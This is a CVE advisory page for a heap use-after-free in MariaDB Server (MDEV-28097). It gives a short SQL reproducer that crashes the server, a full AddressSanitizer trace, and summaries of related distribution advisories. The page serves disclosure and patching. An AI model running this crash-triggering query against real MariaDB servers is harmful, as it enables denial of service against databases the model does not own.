Headline
CVE-2022-27455: [MDEV-28097] use-after-free when WHERE has subquery with an outer reference in HAVING
MariaDB Server v10.6.3 and below was discovered to contain an use-after-free in the component my_wildcmp_8bit_impl at /strings/ctype-simple.c.
CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 60 ) NOT NULL ) ;
INSERT INTO v0 ( ) VALUES ( v1 IN ( 127 , -1 = v1 OR -1 , 0 ) ) , ( 0 ) ;
SELECT DISTINCT * FROM v0 WHERE ‘’ IN ( SELECT + ‘x’ LIKE v1 HAVING + v1 LIKE v1 ORDER BY v1 + v1 ) ;
==9327==ERROR: AddressSanitizer: heap-use-after-free on address 0x6290000c8288 at pc 0x000002b241e8 bp 0x7f3952747de0 sp 0x7f3952747dd8
READ of size 1 at 0x6290000c8288 thread T17
#0 0x2b241e7 in my\_wildcmp\_8bit\_impl /root/mariadb/strings/ctype-simple.c:964:12
#1 0x2b2397a in my\_wildcmp\_8bit /root/mariadb/strings/ctype-simple.c:1050:10
#2 0x16eea86 in charset\_info\_st::wildcmp(char const\*, char const\*, char const\*, char const\*, int, int, int) const /root/mariadb/include/m\_ctype.h:910:12
#3 0x16eea86 in Item\_func\_like::val\_int() /root/mariadb/sql/item\_cmpfunc.cc:5627:35
#4 0x1315e0d in Type\_handler\_int\_result::Item\_val\_bool(Item\*) const /root/mariadb/sql/sql\_type.cc:5105:16
#5 0x16ec0f7 in Item\_cond\_and::val\_int() /root/mariadb/sql/item\_cmpfunc.cc:5421:16
#6 0xdc6895 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4610:31
#7 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#8 0x1952e43 in subselect\_single\_select\_engine::exec() /root/mariadb/sql/item\_subselect.cc:4115:11
#9 0x1928ebb in Item\_subselect::exec() /root/mariadb/sql/item\_subselect.cc:853:21
#10 0x1928ebb in Item\_in\_subselect::exec() /root/mariadb/sql/item\_subselect.cc:1035:3
#11 0x193469a in Item\_in\_subselect::val\_bool() /root/mariadb/sql/item\_subselect.cc:1965:7
#12 0x16bcbca in Item\_in\_optimizer::val\_int() /root/mariadb/sql/item\_cmpfunc.cc:1637:17
#13 0x1675138 in Item\_cache\_int::cache\_value() /root/mariadb/sql/item.cc:10054:19
#14 0x1666bec in Item\_cache\_wrapper::cache() /root/mariadb/sql/item.cc:8839:15
#15 0x1666bec in Item\_cache\_wrapper::val\_int() /root/mariadb/sql/item.cc:8893:3
#16 0xe30e35 in evaluate\_join\_record(JOIN\*, st\_join\_table\*, int) /root/mariadb/sql/sql\_select.cc:21193:25
#17 0xd4c23d in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21134:9
#18 0xdc6797 in do\_select(JOIN\*, Procedure\*) /root/mariadb/sql/sql\_select.cc:20640:14
#19 0xdc6797 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4749:50
#20 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#21 0xd4e4e8 in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /root/mariadb/sql/sql\_select.cc:5007:9
#22 0xd4d74b in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /root/mariadb/sql/sql\_select.cc:543:10
#23 0xc74410 in execute\_sqlcom\_select(THD\*, TABLE\_LIST\*) /root/mariadb/sql/sql\_parse.cc:6252:12
#24 0xc609c9 in mysql\_execute\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:3943:12
#25 0xc4a67e in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /root/mariadb/sql/sql\_parse.cc:8027:18
#26 0xc41ba9 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /root/mariadb/sql/sql\_parse.cc:1894:7
#27 0xc4b74b in do\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:1402:17
#28 0x111f9f2 in do\_handle\_one\_connection(CONNECT\*, bool) /root/mariadb/sql/sql\_connect.cc:1418:11
#29 0x111f248 in handle\_one\_connection /root/mariadb/sql/sql\_connect.cc:1312:5
#30 0x1f3f9dd in pfs\_spawn\_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#31 0x7f3978f38608 in start\_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread\_create.c:477:8
#32 0x7f3978c4e162 in clone /build/glibc-sMfBJT/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86\_64/clone.S:95
0x6290000c8288 is located 136 bytes inside of 16512-byte region [0x6290000c8200,0x6290000cc280)
freed by thread T17 here:
#0 0x80f732 in free (/usr/local/mysql/bin/mariadbd+0x80f732)
#1 0x243e1b8 in mem\_heap\_free(mem\_block\_info\_t\*) /root/mariadb/storage/innobase/include/mem0mem.inl:419:3
#2 0x243e1b8 in row\_mysql\_prebuilt\_free\_blob\_heap(row\_prebuilt\_t\*) /root/mariadb/storage/innobase/row/row0mysql.cc:101:2
#3 0x24b554c in row\_sel\_store\_mysql\_rec(unsigned char\*, row\_prebuilt\_t\*, unsigned char const\*, dtuple\_t const\*, bool, dict\_index\_t const\*, unsigned short const\*) /root/mariadb/storage/innobase/row/row0sel.cc:3109:3
#4 0x24afa37 in row\_search\_mvcc(unsigned char\*, page\_cur\_mode\_t, row\_prebuilt\_t\*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
#5 0x217429c in ha\_innobase::general\_fetch(unsigned char\*, unsigned int, unsigned int) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:9236:24
#6 0x15c44c3 in handler::ha\_rnd\_next(unsigned char\*) /root/mariadb/sql/handler.cc:3393:5
#7 0x930064 in rr\_sequential(READ\_RECORD\*) /root/mariadb/sql/records.cc:519:35
#8 0xd4c3e1 in READ\_RECORD::read\_record() /root/mariadb/sql/records.h:81:30
#9 0xd4c3e1 in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21114:18
#10 0xdc6797 in do\_select(JOIN\*, Procedure\*) /root/mariadb/sql/sql\_select.cc:20640:14
#11 0xdc6797 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4749:50
#12 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#13 0xd4e4e8 in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /root/mariadb/sql/sql\_select.cc:5007:9
#14 0xd4d74b in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /root/mariadb/sql/sql\_select.cc:543:10
#15 0xc74410 in execute\_sqlcom\_select(THD\*, TABLE\_LIST\*) /root/mariadb/sql/sql\_parse.cc:6252:12
#16 0xc609c9 in mysql\_execute\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:3943:12
#17 0xc4a67e in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /root/mariadb/sql/sql\_parse.cc:8027:18
#18 0xc41ba9 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /root/mariadb/sql/sql\_parse.cc:1894:7
#19 0xc4b74b in do\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:1402:17
#20 0x111f9f2 in do\_handle\_one\_connection(CONNECT\*, bool) /root/mariadb/sql/sql\_connect.cc:1418:11
#21 0x111f248 in handle\_one\_connection /root/mariadb/sql/sql\_connect.cc:1312:5
#22 0x1f3f9dd in pfs\_spawn\_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#23 0x7f3978f38608 in start\_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread\_create.c:477:8
previously allocated by thread T17 here:
#0 0x80f99d in malloc (/usr/local/mysql/bin/mariadbd+0x80f99d)
#1 0x215c51e in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /root/mariadb/storage/innobase/include/ut0new.h:375:11
#2 0x2301754 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /root/mariadb/storage/innobase/mem/mem0mem.cc:277:37
#3 0x24be2fc in mem\_heap\_create\_func(unsigned long, unsigned long) /root/mariadb/storage/innobase/include/mem0mem.inl:377:10
#4 0x24be2fc in row\_sel\_store\_mysql\_field(unsigned char\*, row\_prebuilt\_t\*, unsigned char const\*, dict\_index\_t const\*, unsigned short const\*, unsigned long, mysql\_row\_templ\_t const\*) /root/mariadb/storage/innobase/row/row0sel.cc:3050:27
#5 0x24b4ea9 in row\_sel\_store\_mysql\_rec(unsigned char\*, row\_prebuilt\_t\*, unsigned char const\*, dtuple\_t const\*, bool, dict\_index\_t const\*, unsigned short const\*) /root/mariadb/storage/innobase/row/row0sel.cc:3196:8
#6 0x24afa37 in row\_search\_mvcc(unsigned char\*, page\_cur\_mode\_t, row\_prebuilt\_t\*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
#7 0x21739c3 in ha\_innobase::index\_read(unsigned char\*, unsigned char const\*, unsigned int, ha\_rkey\_function) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:8970:5
#8 0x2174d99 in ha\_innobase::index\_first(unsigned char\*) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:9339:14
#9 0x2174d99 in ha\_innobase::rnd\_next(unsigned char\*) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:9432:11
#10 0x15c44c3 in handler::ha\_rnd\_next(unsigned char\*) /root/mariadb/sql/handler.cc:3393:5
#11 0x930064 in rr\_sequential(READ\_RECORD\*) /root/mariadb/sql/records.cc:519:35
#12 0xd4c04d in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21092:12
#13 0xdc6797 in do\_select(JOIN\*, Procedure\*) /root/mariadb/sql/sql\_select.cc:20640:14
#14 0xdc6797 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4749:50
#15 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#16 0xd4e4e8 in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /root/mariadb/sql/sql\_select.cc:5007:9
#17 0xd4d74b in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /root/mariadb/sql/sql\_select.cc:543:10
#18 0xc74410 in execute\_sqlcom\_select(THD\*, TABLE\_LIST\*) /root/mariadb/sql/sql\_parse.cc:6252:12
#19 0xc609c9 in mysql\_execute\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:3943:12
#20 0xc4a67e in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /root/mariadb/sql/sql\_parse.cc:8027:18
#21 0xc41ba9 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /root/mariadb/sql/sql\_parse.cc:1894:7
#22 0xc4b74b in do\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:1402:17
#23 0x111f9f2 in do\_handle\_one\_connection(CONNECT\*, bool) /root/mariadb/sql/sql\_connect.cc:1418:11
#24 0x111f248 in handle\_one\_connection /root/mariadb/sql/sql\_connect.cc:1312:5
#25 0x1f3f9dd in pfs\_spawn\_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#26 0x7f3978f38608 in start\_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread\_create.c:477:8
Thread T17 created by T0 here:
#0 0x7f9cfc in pthread\_create (/usr/local/mysql/bin/mariadbd+0x7f9cfc)
#1 0x1f3fd39 in my\_thread\_create(unsigned long\*, pthread\_attr\_t const\*, void\* (\*)(void\*), void\*) /root/mariadb/storage/perfschema/my\_thread.h:52:10
#2 0x1f3fd39 in pfs\_spawn\_thread\_v1 /root/mariadb/storage/perfschema/pfs.cc:2252:15
#3 0x85cef4 in inline\_mysql\_thread\_create(unsigned int, unsigned long\*, pthread\_attr\_t const\*, void\* (\*)(void\*), void\*) /root/mariadb/include/mysql/psi/mysql\_thread.h:1139:11
#4 0x85cef4 in create\_thread\_to\_handle\_connection(CONNECT\*) /root/mariadb/sql/mysqld.cc:5975:19
#5 0x85e72a in create\_new\_thread(CONNECT\*) /root/mariadb/sql/mysqld.cc:6034:3
#6 0x85e72a in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /root/mariadb/sql/mysqld.cc:6096:5
#7 0x85a34c in handle\_connections\_sockets() /root/mariadb/sql/mysqld.cc:6220:9
#8 0x84e9ef in mysqld\_main(int, char\*\*) /root/mariadb/sql/mysqld.cc:5870:3
#9 0x7f3978b530b2 in \_\_libc\_start\_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /root/mariadb/strings/ctype-simple.c:964:12 in my_wildcmp_8bit_impl
Shadow bytes around the buggy address:
0x0c5280011000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c5280011050: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011090: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c52800110a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==9327==ABORTING
Related news
Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.
Ubuntu Security Notice 5739-1 - Several security issues were discovered in MariaDB and this update includes new upstream MariaDB versions to fix these issues. MariaDB has been updated to 10.3.37 in Ubuntu 20.04 LTS and to 10.6.11 in Ubuntu 22.04 LTS and Ubuntu 22.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.
An update for galera, mariadb, and mysql-selinux is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via cert...
An update for the mariadb:10.5 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT ...
An update for rh-mariadb105-galera and rh-mariadb105-mariadb is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application ...
MariaDB CONNECT Storage Engine Heap-based Buffer Overflow Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MariaDB. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of SQL queries. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-16190.